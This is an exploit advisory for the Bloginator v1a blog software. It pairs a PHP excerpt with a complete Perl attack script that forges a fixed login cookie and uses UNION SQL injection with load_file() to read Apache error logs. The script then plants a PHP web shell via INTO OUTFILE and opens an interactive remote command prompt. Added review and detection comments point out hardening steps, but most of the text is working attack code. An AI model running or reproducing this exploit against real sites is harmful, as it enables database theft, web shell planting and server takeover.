Bloginator v1a SQL Command Injection via Cookie Bypass Exploit
##########################################################################

Author = FireShot , Jacopo Vuga.
Thx to = Osirys for developing the Exploitation Code with me
Mail = fireshot<at>autistici<dot>org / osirys<at>autistici<dot>org

Vulnerability = SQL Command Injection (magic_quotes_gpc = off)
Software = Bloginator V1A
Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0

Greets to = Myral, str0ke

###########################################################################

[CODE]


[URL] www.site.com/bloginator/articleCall.php

global $name,$password,$returnLink;
$p_name = strip_tags(substr($_POST['name'],0,32));
$p_password = strip_tags(substr($_POST['password'],0,32));
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
{

          setcookie(`identifyYourself`,`you are identified`);
          print `Login successfull<br>`;
          print $returnLink;
      }
  else {print `Wrong username or password`;
  }
}
[...]
// Request-controlled action selector.  The `@` only silences the
// "undefined index" notice; it does not validate or restrict the value.
$action = @$_GET['action'];
[...]
// `id` is read from the query string with no validation, casting or
// escaping; editArticle() below interpolates it directly into SQL.
$id = $_GET['id'];
[...]
// Loads one article for the edit form.  $id arrives straight from
// $_GET['id'] and is interpolated, unescaped, into the WHERE clause --
// this is the injection point the advisory describes; the single quote
// around it is only protective while magic_quotes escapes input (hence
// "mq = off" in the header).  The only gate in front of this path appears
// to be the login cookie, which the login code above sets to a constant
// value ("you are identified") rather than a per-session secret, so it can
// be supplied without credentials.  NOTE(review): the cookie check itself
// is not part of this excerpt; confirm how it is evaluated.
// Hardening: bind $id as a query parameter (or escape/cast it) and tie
// authorisation to a server-side session instead of a fixed cookie value.
// NOTE(review): the backtick string delimiters on this page look like a
// rendering artefact of double quotes.
function editArticle($id,$message)
{
global $returnLink;
// Injection sink: $id is concatenated into the SQL text.
$query = `select * FROM articles WHERE id='$id'`;
// NOTE(review): die(mysql_query()) calls mysql_query() with no arguments;
// mysql_error() was presumably intended, so the real DB error is never shown.
$sql = mysql_query($query) or die(mysql_query());
// The three fields below are HTML-escaped before display ...
$title = mysql_result($sql,0,'title');
$title = htmlentities($title);
$article = mysql_result($sql,0,'article');
$article = htmlentities($article);
$link = mysql_result($sql,0,'link');
$link = htmlentities($link);

// ... but $id itself is passed to startHTML() unescaped, so depending on
// what startHTML() does with its argument this may also reflect user input.
startHTML(`Edit ID # `.$id);
?>

[/CODE]


[EXPLOIT]

#!/usr/bin/perl

use IO::Socket;
use LWP::UserAgent;

# --- main ------------------------------------------------------------------
# Argument: the base URL of the install (http://host/cms_path), see help().
# The script chains the two weaknesses shown in the PHP excerpt: the constant
# "identifyYourself" cookie stands in for authentication, and the unescaped
# id parameter of articleCall.php?action=edit gives a UNION-based injection.
# NOTE(review): throughout this page the string delimiters render as
# backticks (`...`) and "&" as "&amp;"; that looks like a transcription
# artefact of the original double quotes -- as printed, backtick strings in
# Perl would be shell commands.
my $host = $ARGV[0];
# 1..9; makes the 404 marker below unique per run.
my $rand = int(rand 9) +1;

# Candidate Apache error-log locations, tried in order.  Two of them
# (/var/log/apache/error.log and /var/log/apache/error_log) are listed twice.
my @error_logs  =  qw(
                     /var/log/httpd/error.log
                     /var/log/httpd/error_log
                     /var/log/apache/error.log
                     /var/log/apache/error_log
                     /var/log/apache2/error.log
                     /var/log/apache2/error_log
                     /logs/error.log
                     /var/log/apache/error_log
                     /var/log/apache/error.log
                     /usr/local/apache/logs/error_log
                     /etc/httpd/logs/error_log
                     /etc/httpd/logs/error.log
                     /var/www/logs/error_log
                     /var/www/logs/error.log
                     /usr/local/apache/logs/error.log
                     /var/log/error_log
                     /apache/logs/error.log
                   );

# Payload that inj_shell() writes to disk: echoes a marker, then runs the
# "cmd" query parameter.  The marker is what every later check looks for.
my $php_c0de   =  `<?php echo \`st4rt\`;system(\$_GET[cmd]);?>`;

# No argument -> usage; argument without "http://" -> usage.
($host) || help(`-1`);
cheek($host) == 1 || help(`-2`);
&amp;banner;

# get_input() returns "host path"; it also assigns the package globals
# $h0st and $path itself, so the split below repeats that work.
$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);


# Step 1: request a file that does not exist so the web server writes
# "File does not exist: <docroot>/osirys_log_test<N>" to its error log.
# Detection note: a 404 for a path of that shape is the first artefact.
print `[*] Generating error through GET request ..\n`;

get_req($host.`/osirys_log_test`.$rand);

print `[*] Cheeking Apache Error Log path ..\n`;

# Step 2: for each candidate log path, read it back through the injection
# with load_file() and look for the marker line; the captured directory is
# the document root.  `<@error_logs>` is a glob() over the interpolated list,
# which yields the paths one at a time.  $gotcha and $stop are package
# globals written by sql_socket(); $ok is never reset.  In practice the loop
# ends inside inj_shell(), which does not return (exec_cmd() recurses until
# "exit" or die).
# Hardening note: without the MySQL FILE privilege (and with secure_file_priv
# set) both load_file() here and INTO OUTFILE in inj_shell() fail, so the DB
# account used by the CMS should not hold it.  A request whose id parameter
# contains "union select" / load_file( is a clear WAF / log signature.
while (($log = <@error_logs>)&amp;&amp;($gotcha != 1)) {
   # Capture group 1 = directory part of the path in the log line.
   my $regexp = `File does not exist: (.+)\/osirys_log_test$rand`;
   my $sql_load_file = `/articleCall.php?action=edit&amp;id=osirys' union select 1,2,3,4,load_file('`.$log.`'),6,7 order by '*`;
   # sql_socket() returns the captured directory, or the string "Failed".
   $re = sql_socket($sql_load_file,$regexp,`1`);
   if ($re !~ /Failed/) {
       $site_path = $re;
       $ok = 1;
   }
   if ($ok == 1) {
       print `[*] Error Log path found -> $log\n`;
       print `[*] Website path found -> $site_path\n`;
       &amp;inj_shell;
   }
   else {
       print `[-] Couldn't file error_log !\n`;
   }
}

# Step 3: reuse the injection with INTO OUTFILE to write $php_c0de to
# <docroot>/1337.php, then verify by fetching that file (sql_socket() with
# $way == 2 looks for the "st4rt" marker in it).  This only succeeds when the
# DB account has the FILE privilege and the web root is writable by the MySQL
# server process.  $site_path, $host and $exec_path are package globals;
# $exec_path is set here for exec_cmd().  On failure the script exits.
# Detection note: a new .php file appearing in the document root, or an
# INTO OUTFILE statement in the query log, is the artefact to alert on.
sub inj_shell {
   my $attack  = `/articleCall.php?action=edit&amp;id=osirys' union select 1,2,3,4,'`.$php_c0de.`',6,7 into outfile '`.$site_path.`/1337.php`;
   my $regexp  = `st4rt`;
   my $re = sql_socket($attack,$regexp,`2`);
   if ($re == 1) {
       print `[*] Shell succesfully injected !\n`;
       print `[&amp;] Hi my master, do your job now [!]\n\n`;
       $exec_path = $host.`/1337.php`;
       &amp;exec_cmd;

   }
   else {
       print `[-] Shell not found \n[-] Exploit failed\n\n`;
       exit(0);
   }
}

# Step 4: interactive prompt.  Reads one line from STDIN, appends it as the
# cmd parameter of the dropped file and prints what comes back.  The response
# is first run through tag() (space -> "$", other whitespace -> "*"), which
# presumably exists so that the multi-line output can be matched with a
# single "." pattern; the two substitutions are then reversed.  That round
# trip is lossy: any literal "$" or "*" in the command output is turned into
# a space or newline as well.
# Notes on the flow, all visible below:
#  - the newline read from STDIN is not stripped before the command is
#    appended to the URL; it is only removed in the failure branch;
#  - "exit" is matched as a substring, so any command containing it quits;
#  - $c counts failures for the whole session and is never reset, so the
#    third response without the marker aborts the script;
#  - the sub recurses on itself instead of looping, so a long session
#    keeps growing the call stack.
# $h0st, $cmd, $c and $exec_path are package globals.
sub exec_cmd {
   # Strip a leading "www." from the host shown in the prompt.
   $h0st !~ /www\./ || $h0st =~ s/www\.//;
   print `shell[$h0st]\$> `;
   $cmd = <STDIN>;
   $cmd !~ /exit/ || die `[-] Quitting ..\n`;
   my $exec_path_ = $exec_path.`?cmd=`.$cmd;
   my $re = get_req($exec_path_);
   my $content = tag($re);
   # Output sits between the marker and "**6" (the "6" is the next UNION
   # column on the page, following two whitespace characters -- inferred).
   if ($content =~ /st4rt(.+)\*\*6/) {
       my $out = $1;
       $out =~ s/\$/ /g;
       $out =~ s/\*/\n/g;
       chomp($out);
       print `$out\n`;
       &amp;exec_cmd;
   }
   else {
       $c++;
       $cmd =~ s/\n//;
       print `bash: `.$cmd.`: command not found\n`;
       $c < 3 || die `[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n`;
       &amp;exec_cmd;
   }
}

# Sends one injected GET over a raw TCP socket (port 80, no TLS) carrying the
# constant "identifyYourself=you+are+identified" cookie -- the value the PHP
# login sets on success -- and checks the outcome in one of two ways:
#   $way == 1  read the response line by line until $regexp matches; the
#              first capture group is stored in the package global $gotcha.
#   $way == 2  ignore the response and instead fetch $host/1337.php with
#              get_req(); $gotcha becomes 1 if it contains "st4rt".
# Returns $gotcha when $stop was set, otherwise the string "Failed".
# $stop and $gotcha are package globals and are not reset before a $way == 1
# call, so a match from an earlier call makes the read loop condition false
# on the next call before anything is read.  Because $path already starts
# with "/" and $sql starts with "/articleCall.php", the request line carries
# a double slash.  With HTTP/1.1 and Connection: keep-alive the server may
# not close the connection, so the read loop only ends on a match or EOF;
# the socket is never closed explicitly.  The empty prototype "()" is
# ineffective here since the sub is defined after its call sites (Perl only
# warns); it should simply be dropped.
# Detection note: the request has no User-Agent header and sends a
# Content-Length on a GET, both easy to flag at the web tier.
sub sql_socket() {

   my($sql,$regexp,$way) = @_;
   $sql = tag_encode($sql);

   my $url = $path.`/`.$sql;

   my $data = `GET `.$url.` HTTP/1.1\r\n`.
              `Host: `.$h0st.`\r\n`.
              `Keep-Alive: 300\r\n`.
              `Connection: keep-alive\r\n`.
              `Content-Type: application/x-www-form-urlencoded\r\n`.
              `Cookie: identifyYourself=you+are+identified;\r\n`.
              `Content-Length: 0\r\n\r\n`.
              `\r\n`;

   # Indirect-object syntax; IO::Socket::INET->new(...) is the modern form.
   my $socket   =  new IO::Socket::INET(
                                            PeerAddr => $h0st,
                                            PeerPort => '80',
                                            Proto    => 'tcp',
                                       ) or die `[-] Can't connect to $h0st:80\n[?] $! \n\n`;

   $socket->send($data);

   if ($way == 1) {
       while ((my $e = <$socket>)&amp;&amp;($stop != 1)) {
           if ($e =~ /$regexp/) {
               $gotcha = $1;
               $stop = 1;
           }
       }
   }
   elsif ($way == 2) {
       my $re = get_req($host.`/1337.php`);
       if ($re =~ /st4rt/) {
           $gotcha = 1;
           $stop = 1;
       }
       else {
           $gotcha = 0;
           $stop = 0;
       }
   }
   if ($stop == 1) {
       return($gotcha);
   }
   else {
       return(`Failed`);
   }

}

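# Fetch $url with LWP (4 second timeout) and return the response body.
# On a transport error LWP synthesises its own response object, so the
# returned string is then LWP's error text rather than page content; the
# callers here only pattern-match on it, which keeps that harmless.
# Changes from the original: the empty "()" prototype is dropped (it is
# argument-rejecting if ever seen before a call site) and the URL is kept in
# a lexical instead of leaking into the package global $link, which nothing
# else in this script reads.
sub get_req {
    my ($url) = @_;
    my $agent = LWP::UserAgent->new();
    $agent->timeout(4);
    my $response = $agent->request(HTTP::Request->new(GET => $url));
    return $response->content;
}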

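# Returns 1 when the argument contains the literal "http://", else 0.
# Only that prefix is looked for: the check is unanchored, "https://" is
# rejected, and whatever follows the scheme is accepted unexamined.
# Change from the original: the empty "()" prototype is dropped; a prototype
# seen before a call site would reject the argument at compile time.
sub cheek {
    my ($candidate) = @_;
    return 0 unless defined $candidate;
    return ($candidate =~ m{http://}) ? 1 : 0;
}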

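# Split "http://host/path" into its host and path parts and return them as
# one string, "host path", with the path always starting with "/".
# The host is matched with [a-z.-]{1,30}, so digits and upper case are not
# accepted there; if either regex fails the captures keep their previous
# values (a Perl property of $1/$2), which the original relies on as well.
# Side effect kept from the original: the package globals $h0st and $path
# are assigned here too, since sql_socket() reads them.
# Changes from the original: the separator literal is restored to a
# double-quoted space (the page renders it with backticks, which in Perl
# would run a shell command), the "()" prototype is dropped, and the two
# scratch variables are lexical.
sub get_input {
    my ($url) = @_;
    $url =~ /http:\/\/(.*)/;
    my $without_scheme = $1;
    $without_scheme =~ /([a-z.-]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $path =~ s/(.*)/\/$1/;
    my $host_and_path = $h0st." ".$path;
    return $host_and_path;
}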

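# Replace every space with "$" and every other whitespace character with
# "*", so the result contains no whitespace at all (exec_cmd() reverses
# this after matching).  Returns the transformed copy.
# Change from the original: the empty "()" prototype is dropped; the two
# substitutions are folded into one pass with the same result.
sub tag {
    my ($text) = @_;
    $text =~ s/(\s)/$1 eq ' ' ? '$' : '*'/ge;
    return $text;
}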

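# Minimal percent-encoding of the four characters the request line cannot
# carry raw: space, "<", ">" and the double quote.  Nothing else ("'", "#",
# "&", non-ASCII, ...) is touched.  Returns the encoded copy.
# Changes from the original: the character encoded as %22 is the double
# quote (the page renders that literal as a backtick, which is a
# transcription artefact -- %22 is the encoding of '"'); the "()" prototype
# is dropped; the four substitutions are table driven.
sub tag_encode {
    my ($text) = @_;
    my %code_for = (
        ' ' => '%20',
        '<' => '%3C',
        '>' => '%3E',
        '"' => '%22',
    );
    $text =~ s/([ <>"])/$code_for{$1}/g;
    return $text;
}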

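# Print the tool's banner to STDOUT.  The page renders the string delimiters
# as backticks and the ampersand as "&amp;"; both are restored here to the
# double-quoted strings the code clearly intends.
sub banner {
    print "\n",
          "  ---------------------------\n",
          "     SQL Command Injection   \n",
          "       via Cookie Bypass     \n",
          "         Bloginator V1A      \n",
          "     by FireShot & Osirys    \n",
          "  ---------------------------\n\n";
    return;
}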

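# Explain why the command line was rejected, print the usage line and exit.
#   -1  no URL given
#   -2  the URL does not contain "http://" (see cheek())
# Any other code prints only the usage line.  Always exits with status 0,
# which hides the error from callers that check the exit code.
# Changes from the original: the "()" prototype is dropped, banner() is
# called with parentheses instead of the "&" form (which would otherwise
# pass this sub's @_ through), and the backtick-rendered strings are
# restored to double quotes.
sub help {
    my ($error) = @_;
    if ($error == -1) {
        banner();
        print "\n[-] Input data failed ! \n";
    }
    elsif ($error == -2) {
        banner();
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}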

[/EXPLOIT]

############################################################################ 

# milw0rm.com [2009-03-19]
